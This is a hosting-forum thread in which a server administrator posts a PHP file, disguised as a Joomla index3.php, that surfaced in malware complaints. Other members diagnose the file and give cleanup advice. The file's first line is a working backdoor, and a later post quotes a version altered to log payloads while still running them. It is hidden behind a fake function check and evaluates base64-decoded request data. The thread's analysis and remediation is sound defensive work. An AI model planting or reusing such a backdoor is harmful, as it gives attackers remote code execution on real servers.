afradata (Registered, joined Feb 14, 2013, cPanel Access Level: Root Administrator)
Hi to all

Sorry, my English is not good.

I have cPanel shared hosting. My server is in the xlhost DC.

I've received a few BroBot malware complaints from Bank of America.

xlhost found the user and file with the abuse and sent me the user information.

The malware file is PHP code; when I open its URL in a browser, it opens the Joomla administrator login page.

Here is the PHP code file, please see it:

```php
<?php
// First line of the file as posted: the ternary's "else" branch runs base64-decoded request data through eval()
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
/**
* @version		$Id: index3.php 14401 2010-01-26 14:10:00Z louis $
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license		GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

$_REQUEST['tmpl'] = 'component';
include('index.php');
?>
```
Please help me find this file on my server and remove it or block it.

Thanks all
srpurdy (Well-Known Member, joined Jun 1, 2011, cPanel Access Level: Root Administrator)
Nothing looks unusual in that file. It's more likely either a MySQL injection, or the index.php file (or .htaccess). So I would start by looking at the index.php file and the .htaccess file.

Although that eval() function looks odd... But it's only requesting information. So there has to be a connection to the index.php file.

brianoz (Well-Known Member, Melbourne, Australia, joined Mar 13, 2004, cPanel Access Level: Root Administrator)
This is one of the newer tricks: they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. As you say, the code looks surprisingly benign, but it's not. It's like a permanent backdoor into the server!

One of the clever tricks is that this function name 'date_default_timezone' sounds like one of the PHP functions on the server. However, it's a function that never exists, so the base64_decode (carefully hidden off to the right of the line) is always run.

You can almost certainly safely remove that first line in its entirety and you should then be secure.

cPanelJamyn (Social Engineer, Staff member, joined Jan 29, 2009)
> This is one of the newer tricks: they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. <snip> You can almost certainly safely remove that first line in its entirety and you should then be secure.

Well, to clarify: if you remove the `function_exists('date_default_timezone') ? ...` line, the backdoor will be removed. It's still important to:

1. Determine how they got in. Presumably you are running an old, exploitable version of Joomla (or an old plugin for the platform). It's critical that you keep it up to date, as it's a popular target with a lot of vulnerabilities.

2. Clean up. Search all the files for that (or similar) lines. If they were smart, they'd install at least 3-4 backdoors in the hope you'll miss one.

3. Ensure all software is up to date. If you have WordPress or Drupal or other PHP apps on the account(s), update those too.

4. Reset your passwords. They got in once already, so make sure you have new passwords.

Ideally, you'd do a complete recreation of the account after a compromise (install new software, restore the DB data, etc.), but I understand that's sometimes not possible.
 
bibiloi (Registered, joined Mar 8, 2013, cPanel Access Level: Root Administrator)
> This is one of the newer tricks: they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. As you say, the code looks surprisingly benign, but it's not. It's like a permanent backdoor into the server!
>
> One of the clever tricks is that this function name 'date_default_timezone' sounds like one of the PHP functions on the server. However, it's a function that never exists, so the base64_decode (carefully hidden off to the right of the line) is always run.
>
> You can almost certainly safely remove that first line in its entirety and you should then be secure.

Modifying the PHP file to print what that c_id variable contains, to something like this:
$ cat web/components/news2.class.bak.php

```php
<?php
if (function_exists('date_default_timezone')) {
    date_default_timezone_set('America/Los_Angeles');
} else {
    // Append the decoded c_id payload to a log file before it is executed
    $ft = @fopen("/tmp/hacker.tmp", "ab");
    if ($ft) {
        fwrite($ft, base64_decode($_REQUEST["c_id"]) . "\r\n\r\n");
        fclose($ft);
    }
    @eval(base64_decode($_REQUEST['c_id']));
}
```
After a POST:

195.56.77.46 - - [08/Mar/2013:10:32:01 +0100] "POST /components/news2.class.bak.php HTTP/1.1" 403 15 "-" "Mozilla/5.0 Firefox/3.6.12"
this is what the /tmp/hacker.tmp file contains:

- snipped -